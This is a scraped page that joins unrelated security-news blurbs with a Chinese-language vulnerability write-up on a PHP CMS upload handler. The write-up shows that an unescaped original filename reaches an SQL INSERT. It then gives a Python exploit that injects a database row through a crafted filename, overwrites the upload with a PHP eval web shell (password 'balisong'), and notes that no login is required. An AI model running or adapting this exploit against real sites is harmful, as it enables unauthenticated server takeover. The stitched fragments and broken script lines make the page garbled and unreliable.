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The post A Framework for Resilient DNS Security: DNS Availability Drives Business appeared first on Verisign Blog.
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As 2017 winds down, we all start looking ahead and anticipate what’s to come for 2018. For us at McAfee,...
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private function upload_base($input_name='upfile',$cateid=0) { $rs = $this->lib('upload')->getfile($input_name,$cateid); if($rs["status"] != "ok"){ return $rs; } $array = array(); $array["cate_id"] = $rs['cate']['id']; $array["folder"] = $rs['folder']; $array["name"] = basename($rs['filename']); $array["ext"] = $rs['ext']; $array["filename"] = $rs['filename']; $array["addtime"] = $this->time; $array["title"] = $rs['title']; $array['session_id'] = $this->session->sessid(); $array['user_id'] = $this->session->val('user_id'); $arraylist = array("jpg","gif","png","jpeg"); if(in_array($rs["ext"],$arraylist)){ $img_ext = getimagesize($this->dir_root.$rs['filename']); $my_ext = array("width"=>$img_ext[0],"height"=>$img_ext[1]); $array["attr"] = serialize($my_ext); } $id = $this->model('res')->save($array); if(!$id){ $this->lib('file')->rm($this->dir_root.$rs['filename']); return array('status'=>'error','error'=>P_Lang('图片存储失败')); } $this->model('res')->gd_update($id); $rs = $this->model('res')->get_one($id); $rs["status"] = "ok"; return $rs; }这是一个文件上传函数,然后在该函数开头又调用了getfile函数,跟进:
public function getfile($input='upfile',$cateid=0) { if(!$input){ return array('status'=>'error','content'=>P_Lang('未指定表单名称')); } $this->_cate($cateid); if(isset($_FILES[$input])){ $rs = $this->_upload($input); }else{ $rs = $this->_save($input); } if($rs['status'] != 'ok'){ return $rs; } $rs['cate'] = $this->cate; return $rs; }如果存在上传文件就调用_upload函数,继续跟进:
private function _upload($input) { global $app; $basename = substr(md5(time().uniqid()),9,16); $chunk = $app->get('chunk','int'); $chunks = $app->get('chunks','int'); if(!$chunks){ $chunks = 1; } $tmpname = $_FILES[$input]["name"]; $tmpid = 'u_'.md5($tmpname); $ext = $this->file_ext($tmpname); $out_tmpfile = $this->dir_root.'data/cache/'.$tmpid.'_'.$chunk; if (!$out = @fopen($out_tmpfile.".parttmp", "wb")) { return array('status'=>'error','error'=>P_Lang('无法打开输出流')); } $error_id = $_FILES[$input]['error'] ? $_FILES[$input]['error'] : 0; if($error_id){ return array('status'=>'error','error'=>$this->up_error[$error_id]); } if(!is_uploaded_file($_FILES[$input]['tmp_name'])){ return array('status'=>'error','error'=>P_Lang('上传失败,临时文件无法写入')); } if(!$in = @fopen($_FILES[$input]["tmp_name"], "rb")) { return array('status'=>'error','error'=>P_Lang('无法打开输入流')); } while ($buff = fread($in, 4096)) { fwrite($out, $buff); } @fclose($out); @fclose($in); $app->lib('file')->mv($out_tmpfile.'.parttmp',$out_tmpfile.'.part'); $index = 0; $done = true; for($index=0;$index<$chunks;$index++) { if (!file_exists($this->dir_root.'data/cache/'.$tmpid.'_'.$index.".part") ) { $done = false; break; } } if(!$done){ return array('status'=>'error','error'=>'上传的文件异常'); } $outfile = $this->folder.$basename.'.'.$ext; if(!$out = @fopen($this->dir_root.$outfile,"wb")) { return array('status'=>'error','error'=>P_Lang('无法打开输出流')); } if(flock($out,LOCK_EX)){ for($index=0;$index<$chunks;$index++) { if (!$in = @fopen($this->dir_root.'data/cache/'.$tmpid.'_'.$index.'.part','rb')){ break; } while ($buff = fread($in, 4096)) { fwrite($out, $buff); } @fclose($in); $GLOBALS['app']->lib('file')->rm($this->dir_root.'data/cache/'.$tmpid."_".$index.".part"); } flock($out,LOCK_UN); } @fclose($out); $tmpname = $GLOBALS['app']->lib('string')->to_utf8($tmpname); $title = str_replace(".".$ext,'',$tmpname); return array('title'=>$title,'ext'=>$ext,'filename'=>$outfile,'folder'=>$this->folder,'status'=>'ok'); }其中 $ext = $this->file_ext($tmpname);是检测文件后缀的,看一下:
private function file_ext($tmpname) { $ext = pathinfo($tmpname,PATHINFO_EXTENSION); if(!$ext){ return false; } $ext = strtolower($ext); $filetypes = "jpg,gif,png"; if($this->cate && $this->cate['filetypes']){ $filetypes .= ",".$this->cate['filetypes']; } if($this->file_type){ $filetypes .= ",".$this->file_type; } $list = explode(",",$filetypes); $list = array_unique($list); if(!in_array($ext,$list)){ return false; } return $ext; }上传是比较严格的,只允许上传后缀是jpg,png,gif这种图片后缀的文件,上传我们无法绕过,但是程序对于上传的文件名没有充份的过滤,在函数末尾,将文件名添加到了返回的数组中:
$tmpname = $GLOBALS['app']->lib('string')->to_utf8($tmpname); $title = str_replace(".".$ext,'',$tmpname); return array('title'=>$title,'ext'=>$ext,'filename'=>$outfile,'folder'=>$this->folder,'status'=>'ok'); }这里的$tmpname就是我们上传的文件名,注意,不是上传后的文件名,而是上传前的文件名,并且没有对该文件名过滤,然后返回。
$rs = $this->lib('upload')->getfile($input_name,$cateid); if($rs["status"] != "ok"){ return $rs; } $array = array(); $array["cate_id"] = $rs['cate']['id']; $array["folder"] = $rs['folder']; $array["name"] = basename($rs['filename']); $array["ext"] = $rs['ext']; $array["filename"] = $rs['filename']; $array["addtime"] = $this->time; $array["title"] = $rs['title']; $array['session_id'] = $this->session->sessid(); $array['user_id'] = $this->session->val('user_id'); $arraylist = array("jpg","gif","png","jpeg"); if(in_array($rs["ext"],$arraylist)){ $img_ext = getimagesize($this->dir_root.$rs['filename']); $my_ext = array("width"=>$img_ext[0],"height"=>$img_ext[1]); $array["attr"] = serialize($my_ext); } $id = $this->model('res')->save($array);可以看到这里将返回值中的title的值赋值给了$array[‘title’],这个值是我们可控的,然后将$array带入到了save函数中,我们看一下该函数:
public function save($data,$id=0) { if(!$data || !is_array($data)){ return false; } if($id){ return $this->db->update_array($data,"res",array("id"=>$id)); }else{ return $this->db->insert_array($data,"res"); } }将$data带入到了insert_array函数中,我们看一下该函数:
public function insert_array($data,$tbl,$type="insert") { if(!$tbl || !$data || !is_array($data)){ return false; } if(substr($tbl,0,strlen($this->prefix)) != $this->prefix){ $tbl = $this->prefix.$tbl; } $type = strtolower($type); $sql = $type == 'insert' ? "INSERT" : "REPLACE"; $sql.= " INTO ".$tbl." "; $sql_fields = array(); $sql_val = array(); foreach($data AS $key=>$value){ $sql_fields[] = "`".$key."`"; $sql_val[] = "'".$value."'"; } $sql.= "(".(implode(",",$sql_fields)).") VALUES(".(implode(",",$sql_val)).")"; return $this->insert($sql); }
就是将该数组中的键值遍历出来,将键作为字段名,将值作为对应字段的值。可以看到,对于值是没有进行转义的,其中包括我们可以控制的title的值,那么这里就产生了一个insert的注入。那么这个注入我们有什么用呢?当然首先想到的是一个出数据,但是对于update 或者insert注入,一般来说我会想办法将这个注入升级一下危害。注意这个注入是一个insert注入,并且insert语句是可以一次插入多条内容的,我们不能控制当前这条insert语句的内容,我们可以控制下一条的内容,比如说像这样:
Insert into file values(1,2,3,),(4,5,6)
#-*- coding:utf-8 -*- import requests import sys import re if len(sys.argv) < 2: print u"Usage: url [PHPSESSION]\r\nFor example:\r\n[0] http://localhost\r\n[1] http://localhost 6ogmgp727m0ivf6rnteeouuj02" exit() baseurl = sys.argv[1] phpses = sys.argv[2] if len(sys.argv) > 2 else '' cookies = {'PHPSESSION': phpses} if baseurl[-1] == '/': baseurl = baseurl[:-1] url = baseurl + '/index.php?c=upload&f=save' files = [ ('upfile', ("1','r7ip15ijku7jeu1s1qqnvo9gj0','30',''),('1',0x7265732f3230313730352f32332f,0x393936396465336566326137643432352e6a7067,'',0x7265732f62616c69736f6e672e706870,'1495536080','2.jpg", '<?php @eval($_POST[balisong]);phpinfo();?>', 'image/jpg')), ] files1 = [ ('upfile', ('1.jpg', '<?php @eval($_POST[balisong]);phpinfo();?>', 'image/jpg')), ] r =, files=files, cookies=cookies) response = r.text id ='"id":"(\d+)"', response, re.S).group(1) id = int(id) + 1 url = baseurl + '/index.php?c=upload&f=replace&oldid=%d' % (id) r =, files=files1, cookies=cookies) shell = baseurl + '/res/balisong.php' response = requests.get(shell) if response.status_code == 200: print "congratulation:Your shell:\n%s\npassword:balisong" % (shell) else: print "oh!Maybe failed.Please check"系统默认是不需要注册登录即可上传文件的。
The Uber Data Breach: What Consumers Need to Know
Ride-sharing apps are one of the most successful innovations of the modern digital age. Practically everyone who has a smart...
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GCSB supporting women in STEM through academic scholarships
The Government Communications Bureau (GSCB) has awarded four $10,000 tertiary scholarships to women studying STEM subjects at New Zealand universities.